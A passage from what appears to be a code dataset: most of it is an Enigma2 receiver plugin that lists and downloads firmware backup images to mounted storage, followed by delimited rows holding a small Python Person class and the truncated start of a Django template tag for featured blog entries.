if self.selectedservername == '</ G_ogi':
self.groups = ['VuPlus_Uno4K', 'VuPlus_SoloSEv2', 'DM_520HD']
self.downloading = True
if self.selectedservername == '</ dragec11':
self.groups = ['DM_800HDse', 'VuPlus_Zero4K']
self.downloading = True
if self.selectedservername == '</ jopidane':
self.groups = ['DM_7020HD']
self.downloading = True
if self.selectedservername == '</ mika (www.satelitin.com)':
self.groups = ['Golden_Intestar_Xpeed_LX_Class_S2', 'VuPlus_Uno4K', 'VuPlus_Zero4K']
self.downloading = True
self['actions'] = ActionMap(['SetupActions', 'ColorActions'], {'ok': self.okClicked,
'green': self.okClicked,
'red': self.close,
'cancel': self.close}, -2)
self.ListToMulticontent()
return
def ListToMulticontent(self):
res = []
theevents = []
self.events = []
self.events = self.groups
if dwidth == 1280:
self['list'].l.setItemHeight(34)
self['list'].l.setFont(0, gFont('Sansation-Bold', 30))
for i in range(0, len(self.events)):
res.append(MultiContentEntryText(pos=(0, 5), size=(2, 34), font=0, flags=RT_HALIGN_LEFT, text=''))
res.append(MultiContentEntryText(pos=(30, 2), size=(740, 34), font=0, flags=RT_HALIGN_LEFT, text=self.events[i]))
theevents.append(res)
res = []
else:
self['list'].l.setItemHeight(50)
self['list'].l.setFont(0, gFont('Sansation-Bold', 40))
for i in range(0, len(self.events)):
res.append(MultiContentEntryText(pos=(0, 5), size=(2, 50), font=0, flags=RT_HALIGN_LEFT, text=''))
res.append(MultiContentEntryText(pos=(30, 2), size=(740, 50), font=0, flags=RT_HALIGN_LEFT, text=self.events[i]))
theevents.append(res)
res = []
self['list'].l.setList(theevents)
def okClicked(self):
cindex = self['list'].getSelectionIndex()
selection = str(self.groups[cindex])
self.session.open(Images, self.selectedservername, self.searchstr, selection, self.rooturl)
class Images(Screen):
def __init__(self, session, selectedservername, searchstr, selection, rooturl):
self.session = session
if dwidth == 1280:
skin = '/usr/lib/enigma2/python/Plugins/Extensions/SatVenusPanel/Skin/imagesHD.xml'
else:
skin = '/usr/lib/enigma2/python/Plugins/Extensions/SatVenusPanel/Skin/imagesFHD.xml'
f = open(skin, 'r')
self.skin = f.read()
f.close()
Screen.__init__(self, session)
self.rooturl = rooturl
self.data = []
self.selection = selection
self.selectedservername = selectedservername
self.url = self.rooturl + self.selection + ''
self['ButtonRedtext'] = Label(_('Exit'))
self['ButtonGreentext'] = Label(_('Please select ...'))
self['info'] = Label(_('Getting the list, please wait ...'))
self['menu'] = MenuList([], True, eListboxPythonMultiContent)
list = []
self.list = list
self.status = []
self.slist = []
self['actions'] = ActionMap(['SetupActions', 'MenuActions', 'ColorActions'], {'ok': self.selclicked,
'green': self.selclicked,
'cancel': self.close}, -2)
self.itempreview = False
self.timer = eTimer()
try:
self.timer_conn = self.timer.timeout.connect(self.extractdata)
except:
self.timer.callback.append(self.extractdata)
self.timer.start(100, 1)
def extractdata(self):
success = False
if self.selectedservername == '</ zvonko67' or self.selectedservername == '</ mika (www.satelitin.com)' or self.selectedservername == '</ G_ogi' or self.selectedservername == '</ dragec11' or self.selectedservername == '</ jopidane':
success, self.data = getdata(self.url)
if success == True:
pass
else:
self['info'].setText('Sorry, error in getting images list !')
return
if len(self.data) == 0:
self['info'].setText('No images found !')
return
else:
success, self.data = getplidata(self.url)
if success == True:
pass
else:
self['info'].setText('Sorry, error in getting images list !')
return
if len(self.data) == 0:
self['info'].setText('No images found !')
return
self['info'].setText('Press OK to download selected image !')
self.ListToMulticontent()
def downloadxmlpage(self):
url = self.xmlurl
getPage(url).addCallback(self._gotPageLoad).addErrback(self.errorLoad)
def errorLoad(self, error):
print str(error)
self['info'].setText('Addons download failure, no internet connection or server down !')
self.downloading = False
def _gotPageLoad(self, data):
try:
newdata = ''
self.xml = data
except:
self.xml = data
if self.xml:
xmlstr = minidom.parseString(self.xml)
else:
self.downloading = False
self['info'].setText('Addons download failure, no internet connection or server down !')
return
self.data1 = []
self.names = []
icount = 0
list = []
xmlparse = xmlstr
self.xmlparse = xmlstr
self.data = []
print '688', self.selection
for images in self.xmlparse.getElementsByTagName('images'):
if str(images.getAttribute('cont').encode('utf8')) == self.selection:
for image in images.getElementsByTagName('image'):
item = image.getAttribute('name').encode('utf8')
urlserver = str(image.getElementsByTagName('url')[0].childNodes[0].data)
imagesize = 'image size ' + str(image.getElementsByTagName('imagesize')[0].childNodes[0].data)
timagesize = str(imagesize).replace('image size', '').strip()
print '675', str(timagesize)
urlserver = os.path.basename(urlserver)
self.data.append([urlserver,
'',
'',
timagesize])
self.downloading = True
if len(self.data) == 0:
self['info'].setText('No images found !')
self['info'].setText('Press OK to download selected image !')
self.ListToMulticontent()
def ListToMulticontent(self, result = None):
downloadpath = getDownloadPath()
res = []
theevents = []
if dwidth == 1280:
self['menu'].l.setItemHeight(80)
self['menu'].l.setFont(0, gFont('Sansation-Bold', 22))
self.menulist = []
for i in range(0, len(self.data)):
item = str(self.data[i][0])
idate = str(self.data[i][1])
itime = str(self.data[i][2])
imagesize = str(self.data[i][3])
print item
if os.path.exists(downloadpath + item):
png = '/usr/lib/enigma2/python/Plugins/Extensions/SatVenusPanel/pics/button_red.png'
else:
png = '/usr/lib/enigma2/python/Plugins/Extensions/SatVenusPanel/pics/button_green.png'
res.append(MultiContentEntryText(pos=(0, 1), size=(5, 5), font=0, flags=RT_HALIGN_LEFT, text=''))
res.append(MultiContentEntryPixmapAlphaTest(pos=(5, 25), size=(30, 30), png=loadPNG(png)))
res.append(MultiContentEntryText(pos=(40, 20), size=(730, 25), font=0, flags=RT_HALIGN_LEFT, text=item))
theevents.append(res)
res = []
else:
self['menu'].l.setItemHeight(80)
self['menu'].l.setFont(0, gFont('Sansation-Bold', 34))
self.menulist = []
for i in range(0, len(self.data)):
item = str(self.data[i][0])
idate = str(self.data[i][1])
itime = str(self.data[i][2])
imagesize = str(self.data[i][3])
print item
if os.path.exists(downloadpath + item):
png = '/usr/lib/enigma2/python/Plugins/Extensions/SatVenusPanel/pics/button_red.png'
else:
png = '/usr/lib/enigma2/python/Plugins/Extensions/SatVenusPanel/pics/button_green.png'
res.append(MultiContentEntryText(pos=(0, 1), size=(5, 40), font=0, flags=RT_HALIGN_LEFT, text=''))
res.append(MultiContentEntryPixmapAlphaTest(pos=(5, 25), size=(30, 30), png=loadPNG(png)))
res.append(MultiContentEntryText(pos=(40, 15), size=(900, 40), font=0, flags=RT_HALIGN_LEFT, text=item))
theevents.append(res)
res = []
self.theevents = []
self.theevents = theevents
self['menu'].l.setList(theevents)
self['menu'].show()
def getfreespace(self):
fspace = freespace()
self.freespace = fspace
self.setTitle(self.freespace)
def selclicked(self):
cindex = self['menu'].getSelectionIndex()
if self.selectedservername == '</ zvonko67':
self.url = 'http://178.63.156.75/BackUpImages/zvonko67/' + self.selection + '/'
if self.selectedservername == '</ G_ogi':
self.url = 'http://178.63.156.75/BackUpImages/G_ogi/' + self.selection + '/'
if self.selectedservername == '</ mika (www.satelitin.com)':
self.url = 'http://178.63.156.75/BackUpImages/mika/' + self.selection + '/'
if self.selectedservername == '</ dragec11':
self.url = 'http://178.63.156.75/BackUpImages/dragec11/' + self.selection + '/'
if self.selectedservername == '</ jopidane':
self.url = 'http://178.63.156.75/BackUpImages/jopidane/' + self.selection + '/'
try:
imageurl = self.url + self.data[cindex][0]
except:
imageurl = self.url
imageurl = imageurl.strip()
if ' ' in imageurl:
self.session.open(ScreenBox, _('Sorry, the web address of image containing spaces, please report to the server maintainer to fix'), type=ScreenBox.TYPE_ERROR, timeout=5, close_on_any_key=True)
return
self.imagesize = self.data[cindex][3]
if self.imagesize.strip() == '':
imagesize = '0'
else:
imagesize = self.data[cindex][3].replace('M', '').strip()
print '1190', imageurl
self.session.openWithCallback(self.ListToMulticontent, SelectLocation, imageurl, imagesize)
######################
######################
import urllib2
import HTMLParser
import cStringIO
import datetime
import operator
class HTML2Text(HTMLParser.HTMLParser):
"""
extract text from HTML code
"""
def __init__(self):
HTMLParser.HTMLParser.__init__(self)
self.output = cStringIO.StringIO()
def get_text(self):
"""get the text output"""
return self.output.getvalue()
def handle_starttag(self, tag, attrs):
"""handle tags"""
if tag == 'br':
self.output.write('\n')
def handle_data(self, data):
"""normal text"""
self.output.write(data)
def handle_endtag(self, tag):
if tag == 'p':
self.output.write('\n')
def getnew(idate = None):
try:
now = datetime.datetime.now()
cdate = now.strftime('%Y-%b-%d')
d1 = datetime.datetime.strptime(idate, '%Y-%b-%d')
d2 = datetime.datetime.strptime(str(cdate), '%Y-%b-%d')
delta = d2 - d1
if delta.days < 32:
return True
return False
except:
return False
def getdata(urlStr, searchstr = None):
data = []
try:
fileHandle = urllib2.urlopen(urlStr)
html = fileHandle.read()
fileHandle.close()
except IOError:
print 'Cannot open URL %s for reading' % urlStr
return (False, data)
try:
p = HTML2Text()
p.feed(html)
text = p.get_text()
raw_list = text.splitlines()
except:
return (False, data)
textlist = []
for line in raw_list:
line = line.strip()
print line
if searchstr:
if searchstr == 'New':
if line != '' and '.zip' in line:
nfiparts = []
nfiparts = line.split('.zip')
url = nfiparts[0] + '.zip'
spart = nfiparts[1].strip()
sizdateparts = spart.split(' ')
idate = sizdateparts[0]
try:
itime = sizdateparts[1]
except:
print line
itime = ''
isize = sizdateparts[len(sizdateparts) - 1]
line = line + '\n'
idate = idate.strip()
print 'idate', idate
if getnew(idate):
try:
imdate = datetime.datetime.strptime(idate, '%d-%b-%Y')
except:
imdate = None
data.append([url,
imdate,
itime,
isize])
elif line != '' and '.zip' in line and searchstr.lower() in line.lower():
nfiparts = []
nfiparts = line.split('.zip')
url = nfiparts[0] + '.zip'
spart = nfiparts[1].strip()
sizdateparts = spart.split(' ')
idate = sizdateparts[0]
try:
itime = sizdateparts[1]
except:
print line
itime = ''
isize = sizdateparts[len(sizdateparts) - 1]
line = line + '\n'
try:
imdate = datetime.datetime.strptime(idate, '%d-%b-%Y')
except:
imdate = None
data.append([url,
imdate,
itime,
isize])
elif line != '' and '.zip' in line:
nfiparts = []
nfiparts = line.split('.zip')
url = nfiparts[0] + '.zip'
spart = nfiparts[1].strip()
sizdateparts = spart.split(' ')
idate = sizdateparts[0]
try:
itime = sizdateparts[1]
except:
print line
itime = ''
isize = sizdateparts[len(sizdateparts) - 1]
line = line + '\n'
try:
imdate = datetime.datetime.strptime(idate, '%d-%b-%Y')
except:
imdate = ''
data.append([url,
imdate,
itime,
isize])
try:
data.sort(key=operator.itemgetter(1))
except:
pass
data.reverse()
return (True, data)
def getplidata(urlStr, searchstr = None):
data = []
print ' ', urlStr
try:
fileHandle = urllib2.urlopen(urlStr)
html = fileHandle.read()
fileHandle.close()
except IOError:
print 'Cannot open URL %s for reading' % urlStr
return (False, data)
try:
p = HTML2Text()
p.feed(html)
text = p.get_text()
raw_list = text.splitlines()
except:
return (False, data)
data = []
textlist = []
for line in raw_list:
line = line.strip()
if searchstr:
if line != ' ' and '.zip' in line and searchstr.lower() in line.lower():
nfiparts = []
nfiparts = line.split('\n')
x = len(nfiparts)
if x == 1:
url = nfiparts[0]
idate = ''
itime = ''
isize = ''
data.append([url,
idate,
itime,
isize])
continue
try:
url = nfiparts[1]
except:
url = ''
infoparts = nfiparts[0].split(' ')
y = len(infoparts)
try:
idate = infoparts[0]
except:
idate = ''
try:
isize = infoparts[y - 1]
except:
isize = ''
itime = ''
data.append([url,
idate,
itime,
isize])
elif line != '' and '.zip' in line:
nfiparts = []
nfiparts = line.split('\t')
x = len(nfiparts)
if x == 1:
url = nfiparts[0]
idate = ''
itime = ''
isize = ''
data.append([url,
idate,
itime,
isize])
continue
try:
url = nfiparts[1]
except:
url = ''
infoparts = nfiparts[0].split(' ')
y = len(infoparts)
try:
idate = infoparts[0]
except:
idate = ''
try:
isize = infoparts[y - 1]
except:
isize = ''
itime = ''
data.append([url,
idate,
itime,
isize])
print data
return (True, data)
######################
######################
class SelectDownloadLocation(Screen, HelpableScreen):
def __init__(self, session, text = '', filename = '', currDir = None, location = None, userMode = False, minFree = None, autoAdd = False, editDir = False, inhibitDirs = [], inhibitMounts = []):
self.session = session
if dwidth == 1280:
skin = '/usr/lib/enigma2/python/Plugins/Extensions/SatVenusPanel/Skin/sellocHD.xml'
else:
skin = '/usr/lib/enigma2/python/Plugins/Extensions/SatVenusPanel/Skin/sellocFHD.xml'
f = open(skin, 'r')
self.skin = f.read()
f.close()
Screen.__init__(self, session)
HelpableScreen.__init__(self)
self['text'] = StaticText(_('Selected download location:'))
self.text = text
self.filename = filename
self.minFree = minFree
self.reallocation = location
self.location = location and location.value[:] or []
self.userMode = userMode
self.autoAdd = autoAdd
self.editDir = editDir
self.inhibitDirs = inhibitDirs
self.inhibitMounts = inhibitMounts
inhibitDirs = ['/bin',
'/boot',
'/dev',
'/lib',
'/proc',
'/sbin',
'/sys',
'/mnt',
'/var',
'/home',
'/tmp',
'/etc',
'/share',
'/usr']
inhibitMounts = ['/mnt', '/ba', '/MB_Images']
self['filelist'] = FileList(currDir, showDirectories=True, showFiles=False, inhibitMounts=inhibitMounts, inhibitDirs=inhibitDirs)
self['mountlist'] = MenuList(mountedDevs)
self['ButtonGreentext'] = Label(_('SAVE'))
self['ButtonRedtext'] = Label(_('Exit'))
self['target'] = Label()
self['actions'] = ActionMap(['SetupActions', 'ColorActions'], {'red': self.close,
'cancel': self.close}, -2)
if self.userMode:
self.usermodeOn()
class DownloadLocationActionMap(HelpableActionMap):
def __init__(self, parent, context, actions = {}, prio = 0):
HelpableActionMap.__init__(self, parent, context, actions, prio)
self['WizardActions'] = DownloadLocationActionMap(self, 'WizardActions', {'left': self.left,
'right': self.right,
'up': self.up,
'down': self.down,
'ok': (self.ok, _('Select')),
'back': (self.cancel, _('Cancel'))}, -2)
self['ColorActions'] = DownloadLocationActionMap(self, 'ColorActions', {'red': self.cancel,
'green': self.select}, -2)
self.onLayoutFinish.append(self.switchToFileListOnStart)
def switchToFileListOnStart(self):
if self.reallocation and self.reallocation.value:
self.currList = 'filelist'
currDir = self['filelist'].current_directory
if currDir in self.location:
self['filelist'].moveToIndex(self.location.index(currDir))
else:
self.switchToFileList()
def switchToFileList(self):
if not self.userMode:
self.currList = 'filelist'
self['filelist'].selectionEnabled(1)
self.updateTarget()
def up(self):
self[self.currList].up()
self.updateTarget()
def down(self):
self[self.currList].down()
self.updateTarget()
def left(self):
self[self.currList].pageUp()
self.updateTarget()
def right(self):
self[self.currList].pageDown()
self.updateTarget()
def ok(self):
if self.currList == 'filelist':
if self['filelist'].canDescent():
self['filelist'].descent()
self.updateTarget()
def updateTarget(self):
currFolder = self.getPreferredFolder()
if currFolder is not None:
self['target'].setText(''.join((currFolder, self.filename)))
else:
self['target'].setText(_('Invalid Location'))
return
def cancel(self):
self.close(None)
return
def getPreferredFolder(self):
if self.currList == 'filelist':
return self['filelist'].getSelection()[0]
def saveSelection(self, ret):
if ret:
ret = ''.join((self.getPreferredFolder(), self.filename))
config.plugins.ImageDownLoader2.Downloadlocation.value = ret
config.plugins.ImageDownLoader2.Downloadlocation.save()
config.plugins.ImageDownLoader2.save()
config.save()
self.close(None)
return
def checkmountDownloadPath(self, path):
if path is None:
self.session.open(ScreenBox, _('nothing entered'), ScreenBox.TYPE_ERROR)
return False
else:
sp = []
sp = path.split('/')
print sp
if len(sp) > 1:
if sp[1] != 'media':
self.session.open(ScreenBox, mounted_string + path, ScreenBox.TYPE_ERROR)
return False
mounted = False
self.swappable = False
sp2 = []
f = open('/proc/mounts', 'r')
m = f.readline()
while m and not mounted:
if m.find('/%s/%s' % (sp[1], sp[2])) is not -1:
mounted = True
print m
sp2 = m.split(' ')
print sp2
if sp2[2].startswith('ext') or sp2[2].endswith('fat'):
print '[stFlash] swappable'
self.swappable = True
m = f.readline()
f.close()
if not mounted:
self.session.open(ScreenBox, mounted_string + str(path), ScreenBox.TYPE_ERROR)
return False
if os.path.exists(config.plugins.ImageDownLoader2.Downloadlocation.value):
try:
os.chmod(config.plugins.ImageDownLoader2.Downloadlocation.value, 511)
except:
pass
return True
return
def select(self):
currentFolder = self.getPreferredFolder()
foldermounted = self.checkmountDownloadPath(currentFolder)
if foldermounted == True:
pass
else:
return
if currentFolder is not None:
if self.minFree is not None:
try:
s = os.statvfs(currentFolder)
if s.f_bavail * s.f_bsize / 314572800 > self.minFree:
return self.saveSelection(True)
except OSError:
pass
self.session.openWithCallback(self.saveSelection, ScreenBox, _('There might not be enough Space on the selected Partition.\nDo you really want to continue?'), type=ScreenBox.TYPE_YESNO)
else:
self.saveSelection(True)
return
class DownloadedFiles(Screen):
def __init__(self, session):
self.session = session
if dwidth == 1280:
skin = '/usr/lib/enigma2/python/Plugins/Extensions/SatVenusPanel/Skin/dlfilesHD.xml'
else:
skin = '/usr/lib/enigma2/python/Plugins/Extensions/SatVenusPanel/Skin/dlfilesFHD.xml'
f = open(skin, 'r')
self.skin = f.read()
f.close()
Screen.__init__(self, session)
list = []
self['menu'] = MenuList([], True, eListboxPythonMultiContent)
self['ButtonRedtext'] = Label(_('Back '))
self['ButtonGreentext'] = Label(_(' '))
folder = str(config.plugins.ImageDownLoader2.Downloadlocation.value)
fspace = str(freespace()) + 'MB'
self['menu'].onSelectionChanged.append(self.selectionChanged)
self['info'] = Label(folder + '\n' + ' Free space: ' + fspace)
if folder.endswith('/'):
self.folder = folder
else:
self.folder = folder + '/'
self['actions'] = ActionMap(['SetupActions', 'ColorActions'], {'green': self.delimage,
'cancel': self.close}, -2)
self.fillplgfolders()
def selectionChanged(self):
try:
fname = self['menu'].getCurrent()
cindex = self['menu'].getSelectionIndex()
filename = self.nfifiles[cindex][0]
if filename.endswith(".zip") or filename.endswith('.nfi'):
self['ButtonGreentext'].setText('Delete Image')
else:
self['ButtonGreentext'].setText(' ')
except:
pass
def delimage(self):
fname = self['menu'].getCurrent()
cindex = self['menu'].getSelectionIndex()
filename = self.folder + self.nfifiles[cindex][0]
if filename.endswith(".zip") or filename.endswith('.nfi'):
self['ButtonGreentext'].setText('Delete Image')
self.session.openWithCallback(self.removefile, ScreenBox, _(filename + '\nwill Be Removed,\nAre You Sure ?'), ScreenBox.TYPE_YESNO)
else:
self['ButtonGreentext'].setText(' ')
def removefile(self, result):
if result:
try:
fname = self['menu'].getCurrent()
cindex = self['menu'].getSelectionIndex()
filename = self.folder + self.nfifiles[cindex][0]
remove(filename)
self.fillplgfolders()
except:
self.session.open(ScreenBox, _('Sorry, unable to delete file!'), type=ScreenBox.TYPE_ERROR, timeout=5, close_on_any_key=True)
def fillplgfolders(self):
try:
self.nfifiles = []
for x in listdir(self.folder):
if os.path.isfile(self.folder + x):
if x.endswith('.nfi') or x.endswith('.zip'):
msize = os.path.getsize(self.folder + x)
localimagesize = str(round(float(msize / 1048576.0), 2))
self.nfifiles.append([x, localimagesize])
self.ListToMulticontent()
except:
self.session.open(ScreenBox, _('Sorry, unable to show files, check ' + self.folder + ' is available and mounted!'), type=ScreenBox.TYPE_ERROR, timeout=5, close_on_any_key=True)
def ListToMulticontent(self):
res = []
theevents = []
self.events = []
self.events = self.nfifiles
if dwidth == 1280:
self['menu'].l.setItemHeight(40)
self['menu'].l.setFont(0, gFont('Sansation-Bold', 25))
for i in range(0, len(self.events)):
mfile = self.events[i][0]
msize = self.events[i][1] + 'MB'
res.append(MultiContentEntryText(pos=(0, 5), size=(2, 35), font=0, flags=RT_HALIGN_LEFT, text=''))
res.append(MultiContentEntryText(pos=(10, 5), size=(650, 35), font=0, flags=RT_HALIGN_LEFT, text=mfile))
res.append(MultiContentEntryText(pos=(660, 5), size=(150, 35), font=0, flags=RT_HALIGN_LEFT, text=msize))
theevents.append(res)
res = []
else:
self['menu'].l.setItemHeight(45)
self['menu'].l.setFont(0, gFont('Sansation-Bold', 35))
for i in range(0, len(self.events)):
mfile = self.events[i][0]
msize = self.events[i][1] + 'MB'
res.append(MultiContentEntryText(pos=(0, 5), size=(2, 40), font=0, flags=RT_HALIGN_LEFT, text=''))
res.append(MultiContentEntryText(pos=(10, 5), size=(650, 40), font=0, flags=RT_HALIGN_LEFT, text=mfile))
res.append(MultiContentEntryText(pos=(660, 5), size=(150, 40), font=0, flags=RT_HALIGN_LEFT, text=msize))
theevents.append(res)
res = []
self['menu'].l.setList(theevents)
self['menu'].show()
class SelectLocation(Screen):
def __init__(self, session, imageurl = None, imagesize = None):
self.session = session
if dwidth == 1280:
skin = '/usr/lib/enigma2/python/Plugins/Extensions/SatVenusPanel/Skin/izberiHD.xml'
else:
skin = '/usr/lib/enigma2/python/Plugins/Extensions/SatVenusPanel/Skin/izberiFHD.xml'
f = open(skin, 'r')
self.skin = f.read()
f.close()
Screen.__init__(self, session)
self.menu = 0
self.imagesize = imagesize
self.imageurl = imageurl
self.list = []
self.oktext = _('')
self.text = ''
self['ButtonRedtext'] = Label(_('Exit'))
self['ButtonGreentext'] = Label(_('Please select ...'))
if self.menu == 0:
self.list.append(('Download', _('Start Download'), None))
self.list.append(('Downloadlocation', _('Choose Download Location'), None))
self.list.append(('files', _('View Downloaded Images'), None))
self['menu'] = List(self.list)
self['status'] = StaticText('')
self['targettext'] = StaticText(_('Selected Download Location:'))
fname = os.path.basename(self.imageurl)
if 'DreamEliteImages' in fname:
a = []
a = fname.split('=')
fname = a[2]
self['downloadtext'] = StaticText(_('Selected image to download:\n' + fname))
fspace = str(freespace()) + 'MB'
self['target'] = Label(config.plugins.ImageDownLoader2.Downloadlocation.value + '\nFree space: ' + fspace)
self['shortcuts'] = ActionMap(['ShortcutActions', 'WizardActions', 'InfobarEPGActions'], {'ok': self.go,
'back': self.cancel,
'red': self.cancel}, -1)
self.onLayoutFinish.append(self.layoutFinished)
return
def layoutFinished(self):
idx = 0
self['menu'].index = idx
def fnameexists(self):
path = getDownloadPath()
filename = path + os.path.basename(self.imageurl)
if fileExists(filename):
return True
else:
return False
def callMyMsg(self, result):
path = getDownloadPath()
if self.checkmountDownloadPath(path) == False:
return
if result:
if fileExists('/etc/init.d/flashexpander.sh'):
self.session.open(ScreenBox, _('FlashExpander is used,no Image DownLoad possible.'), ScreenBox.TYPE_INFO)
self.cancel()
else:
runDownload = True
self.localfile = path + os.path.basename(self.imageurl)
self.session.openWithCallback(self.cancel, Downloader, self.imageurl, self.localfile, path)
def callMyMsg2(self, result):
path = config.plugins.ImageDownLoader2.Downloadlocation.value
if self.checkmountDownloadPath(path) == False:
return
if result:
if fileExists('/etc/init.d/flashexpander.sh'):
self.session.open(ScreenBox, _('FlashExpander is used,no Image DownLoad possible.'), ScreenBox.TYPE_INFO)
self.cancel()
else:
runDownload = True
self.session.open(makeSelectTelnet, runDownload, self.imageurl, self.imagesize, console=True)
def checkmountDownloadPath(self, path):
if path is None:
self.session.open(ScreenBox, _('nothing entered'), ScreenBox.TYPE_ERROR)
return False
elif freespace() < 60:
self.session.open(ScreenBox, _('Free space is less than 60MB,please choose another download location,or delete files from storage device'), ScreenBox.TYPE_ERROR)
return False
else:
sp = []
sp = path.split('/')
print sp
if len(sp) > 1:
if sp[1] != 'media':
self.session.open(ScreenBox, mounted_string % path, ScreenBox.TYPE_ERROR)
return False
mounted = False
self.swappable = False
sp2 = []
f = open('/proc/mounts', 'r')
m = f.readline()
while m and not mounted:
if m.find('/%s/%s' % (sp[1], sp[2])) is not -1:
mounted = True
print m
sp2 = m.split(' ')
print sp2
if sp2[2].startswith('ext') or sp2[2].endswith('fat'):
print '[stFlash] swappable'
self.swappable = True
m = f.readline()
f.close()
if not mounted:
self.session.open(ScreenBox, mounted_string + str(path), ScreenBox.TYPE_ERROR)
return False
if os.path.exists(config.plugins.ImageDownLoader2.Downloadlocation.value):
try:
os.chmod(config.plugins.ImageDownLoader2.Downloadlocation.value, 511)
except:
pass
return True
return
def go(self):
current = self['menu'].getCurrent()
if current:
currentEntry = current[0]
if self.menu == 0:
if currentEntry == 'settings':
self.session.openWithCallback(self.updateSwap, SelectSetting)
if currentEntry == 'Download':
if not self.fnameexists() == True:
self.session.openWithCallback(self.callMyMsg, ScreenBox, _('You selected to download:\n' + self.imageurl + '\ncontinue ?'), ScreenBox.TYPE_YESNO)
else:
self.session.openWithCallback(self.callMyMsg, ScreenBox, _('The file already exists,\n' + 'overwrite ?'), ScreenBox.TYPE_YESNO)
if currentEntry == 'console':
if not self.fnameexists() == True:
self.session.openWithCallback(self.callMyMsg2, ScreenBox, _('You selected to download ' + self.imageurl + ',continue?'), ScreenBox.TYPE_YESNO)
else:
self.session.openWithCallback(self.callMyMsg2, ScreenBox, _('The file aleady exists ' + ',overwrite?'), ScreenBox.TYPE_YESNO)
if currentEntry == 'files':
self.session.open(DownloadedFiles)
elif currentEntry == 'Downloadlocation':
self.session.openWithCallback(self.Downloadlocation_choosen, SelectDownloadLocation)
def updateSwap(self, retval):
self['swapsize'].setText(''.join(config.plugins.ImageDownLoader2.swap.value + ' MB'))
def Downloadlocation_choosen(self, option):
self.updateTarget()
if option is not None:
config.plugins.ImageDownLoader2.Downloadlocation.value = str(option[1])
config.plugins.ImageDownLoader2.Downloadlocation.save()
config.plugins.ImageDownLoader2.save()
config.save()
self.createDownloadfolders()
return
def createDownloadfolders(self):
self.Downloadpath = getDownloadPath()
try:
if os_path.exists(self.Downloadpath) == False:
makedirs(self.Downloadpath)
except OSError:
self.session.openWithCallback(self.goagaintoDownloadlocation, ScreenBox, _('Sorry, your Download destination is not writeable.\n\nPlease choose another one.'), ScreenBox.TYPE_ERROR)
def goagaintoDownloadlocation(self, retval):
self.session.openWithCallback(self.Downloadlocation_choosen, SelectDownloadLocation)
def updateTarget(self):
fspace = str(freespace()) + 'MB'
self['target'].setText(''.join(config.plugins.ImageDownLoader2.Downloadlocation.value + ' Freespace:' + fspace))
def DownloadDone(self, retval = None):
if retval is False:
self.session.open(ScreenBox, _(''), ScreenBox.TYPE_ERROR, timeout=10)
elif config.plugins.ImageDownLoader2.update.value == True:
self.session.open()
else:
self.cancel()
def cancel(self, result = None):
self.close(None)
return
def runUpgrade(self, result):
if result:
self.session.open()
class Downloader(Screen):
def __init__(self, session, url = None, target = None, path = None):
self.session = session
if dwidth == 1280:
skin = '/usr/lib/enigma2/python/Plugins/Extensions/SatVenusPanel/Skin/dlHD.xml'
else:
skin = '/usr/lib/enigma2/python/Plugins/Extensions/SatVenusPanel/Skin/dlFHD.xml'
f = open(skin, 'r')
self.skin = f.read()
f.close()
Screen.__init__(self, session)
print url
self.url = url
self.target = target
self.path = path
self.nfifile = target
self['info'] = Label('')
self['info2'] = Label('')
self['progress'] = ProgressBar()
self.aborted = False
self['progress'].setRange((0, 100))
self['progress'].setValue(0)
self.onLayoutFinish.append(self.startDownload)
self['actions'] = ActionMap(['OkCancelActions'], {'cancel': self.cancel}, -1)
self.connection = None
return
def startDownload(self):
from Tools.Downloader import downloadWithProgress
info = ' Downloading :\n %s ' % self.url
self['info2'].setText(info)
self.downloader = downloadWithProgress(self.url, self.target)
self.downloader.addProgress(self.progress)
self.downloader.start().addCallback(self.responseCompleted).addErrback(self.responseFailed)
def progress(self, current, total):
p = int(100 * (float(current) / float(total)))
self['progress'].setValue(p)
info = _('Downloading') + ' ' + '%d of %d kBytes' % (current / 1024, total / 1024)
info = 'Downloading ... ' + str(p) + '%'
self['info'].setText(info)
self.setTitle(info)
self.last_recvbytes = current
def responseCompleted(self, string = ''):
if self.aborted:
self.finish(aborted=True)
else:
info = 'The image downloaded successfully !'
self['info2'].setText(info)
if self.target.endswith('.zip'):
info = 'The image downloaded successfully !'
self.session.openWithCallback(self.close, ScreenBox, _(info), type=ScreenBox.TYPE_INFO, timeout=3)
elif self.target.endswith('.tar.xz'):
info = 'The image downloaded successfully !'
self.session.openWithCallback(self.close, ScreenBox, _(info), type=ScreenBox.TYPE_INFO, timeout=3)
elif self.target.endswith('.nfi'):
info = 'The image downloaded successfully !'
self.session.openWithCallback(self.close, ScreenBox, _(info), type=ScreenBox.TYPE_INFO, timeout=3)
else:
self.close
return
def responseFailed(self, failure_instance = None, error_message = ''):
self.error_message = error_message
if error_message == '' and failure_instance is not None:
self.error_message = failure_instance.getErrorMessage()
info = 'Download failed ' + self.error_message
self['info2'].setText(info)
self.session.openWithCallback(self.close, ScreenBox, _(info), timeout=3, close_on_any_key=True)
return
def cancel(self):
if self.downloader is not None:
info = 'You are going to abort download, are you sure ?'
self.session.openWithCallback(self.abort, ScreenBox, _(info), type=ScreenBox.TYPE_YESNO)
else:
self.aborted = True
self.close()
return
def abort(self, result = None):
if result:
self.downloader.stop
self.aborted = True
self.close()
def exit(self, result = None):
self.close()
|
23,449 | d19195bdce65a7caa5fc6822bec2d593a3ccbbd1 | class Person(object):
def __init__(self,firstname,lastname):
self.first=firstname
self.last=lastname
def __cmp__(self,other):
return cmp((self.last,self.first),(other.last,other.first))
def __repr__(self):
return "%s %s" %(self.first,self.last)
actors=Person('Eric','Idle')
print(actors) |
23,450 | d165dbd1bc22c6d3f1948b10b69f795baa8ab4a0 | from django import template
from template_utils.templatetags.generic_content import GenericContentNode
register = template.Library()
class LatestFeaturedNode(GenericContentNode):
def _get_query_set(self):
return self.query_set.filter(featured__exact=True)
def do_featured_entries(parser, token):
"""
Retrieves the latest ``num`` featured entries and stores them in a
specified context variable.
Syntax::
{% get_featured_entries [num] as [varname] %}
Example::
{% get_featured_entries 5 as featured_entries %}
"""
bits = token.contents.split()
if len(bits) != 4:
raise template.TemplateSyntaxError("'%s' tag takes three arguments" % bits[0])
if bits[2] != 'as':
raise template.TemplateSyntaxError("second argument to '%s' tag must be 'as'" % bits[0])
return LatestFeaturedNode('coltrane.entry', bits[1], bits[3])
def do_featured_entry(parser, token):
"""
Retrieves the latest featured Entry and stores it in a specified
context variable.
Syntax::
{% get_featured_entry as [varname] %}
Example::
{% get_featured_entry as featured_entry %}
"""
bits = token.contents.split()
if len(bits) != 3:
